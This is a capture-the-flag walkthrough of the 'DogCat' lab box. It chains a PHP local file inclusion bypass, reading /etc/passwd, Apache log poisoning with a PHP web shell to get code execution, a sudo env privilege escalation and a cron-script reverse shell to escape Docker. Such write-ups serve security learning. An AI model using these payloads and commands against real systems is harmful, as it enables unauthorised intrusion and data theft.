DogCat

Enumerating Parameters - Bypass PHP Filter using Wrapper - Exploiting LFI to get RCE - Env PrivEsc - Docker Escape

• Starting off with a nmap scan to know what are all the open ports

# Nmap 7.93 scan initiated Thu Feb  2 13:32:37 2023 as: nmap -sCV -A -vv -p 22,80 -oN nmap.log 10.10.27.48
Nmap scan report for 10.10.27.48
Host is up, received conn-refused (0.27s latency).
Scanned at 2023-02-02 13:32:43 IST for 22s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2431192ab1971a044e2c36ac840a7587 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCeKBugyQF6HXEU3mbcoDHQrassdoNtJToZ9jaNj4Sj9MrWISOmr0qkxNx2sHPxz89dR0ilnjCyT3YgcI5rtcwGT9RtSwlxcol5KuDveQGO8iYDgC/tjYYC9kefS1ymnbm0I4foYZh9S+erXAaXMO2Iac6nYk8jtkS2hg+vAx+7+5i4fiaLovQSYLd1R2Mu0DLnUIP7jJ1645aqYMnXxp/bi30SpJCchHeMx7zsBJpAMfpY9SYyz4jcgCGhEygvZ0jWJ+qx76/kaujl4IMZXarWAqchYufg57Hqb7KJE216q4MUUSHou1TPhJjVqk92a9rMUU2VZHJhERfMxFHVwn3H
|   256 213d461893aaf9e7c9b54c0f160b71e1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBouHlbsFayrqWaldHlTkZkkyVCu3jXPO1lT3oWtx/6dINbYBv0MTdTAMgXKtg6M/CVQGfjQqFS2l2wwj/4rT0s=
|   256 c1fb7d732b574a8bdcd76f49bb3bd020 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIfp73VYZTWg6dtrDGS/d5NoJjoc4q0Fi0Gsg3Dl+M3I
80/tcp open  http    syn-ack Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb  2 13:33:05 2023 -- 1 IP address (1 host up) scanned in 28.30 seconds

• Seems like the /?view php query displays some .jpg files, everytime you request for a dog's images the backend sends a different picture which means it already has few pics

• When we append a slash after the dog, we get an error, It basically uses the include func in php which includes files from an external source - Purely vulnerable to LFI kinda attacks !, It even appends a .php extension after the slash, hmm fishy right ? why not simply check the index.php which is one directory above - /?view=dog/../index (Did not add the .php, as it automatically appends)

• Still no clue, return the same error, so now why don't we try a php wrapper to encode our desired output using base64? So when we try this, we get the desired index.php in a base64 format

• Decoding the above gives us the source code on the filtering works !

        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
	    $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>

• We can see that we have the control over the $ext variable which is responsible for appending the .php after the filename and most importantly the /?view should start with either dog or cat

So inorder to bypass this, we can include the $ext variable in our url and give it an empty value

http://example.com/?view=dog/../index&ext=

• Using the above trick we can dump the /etc/passwd file, no bash session users only www-data is available

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

• Now let's abuse the LFI, checking the /var/log/apache2/access.log - We find our User-Agent being passed in all the requests - which confirms we can perform Apache Log Poisoning attack and leverage it to a RCE !

• Inorder to exploit the log poison attack, we'll first have to insert the php-cmd payload into our User-Agent

<?php system($_GET['cmd']);?>

• Insert a php-exec shell from https://revshells.com into the cmd and get a reverse shell !

http://example.com/?view=dog/../../../../../var/log/apache2/access.log&ext=&cmd={ PHP SHELL }

User-Agent = <?php system($_GET['cmd']);?>

NOTE - Do not commit any mistake while inserting the php payload in the User-Agent, once there is a mistake in the log file then no matter whateva you do, you'll not get the desired result nor even can view the access.log - Grab the first flag and go one directory back and cat out the second flag

Privilege Escalation

• Let's start our enumeration by reading the sudo permissions for the current user

• GTFObins to the rescue !

sudo env /bin/sh

• Enumerating the box more gives us that there might be a docker container and flag4 is hidden there, enumerating the /opt directory gives us a writable file called backup.sh

• Seems to be like that - .sh file is running as cron job and let's just append our reverse shell to get r00t